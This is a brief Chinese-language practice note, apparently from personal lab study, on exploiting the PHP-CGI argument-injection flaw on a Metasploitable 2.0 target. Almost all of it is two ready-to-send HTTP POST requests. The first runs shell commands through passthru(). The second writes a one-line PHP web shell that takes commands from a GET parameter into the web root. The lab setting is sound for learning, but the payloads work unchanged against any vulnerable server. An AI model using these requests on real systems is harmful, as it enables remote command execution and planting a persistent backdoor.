初识漏洞
php漏洞
- 靶机是metesploip系统2.0 ,利用一个早期的默认安装的php漏洞(权限只有web应用账号的权限)
-
POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.1.103 Content-Length: 38 <?php passthru('id'); die(); ?>
- 可以直接使用
passthru()
里面的输入shell命令对靶机进行shell操控
- 可以直接使用
简单木马
-
POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.1.103 Content-Length: 38 <?php passthru('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php'); die(); ?>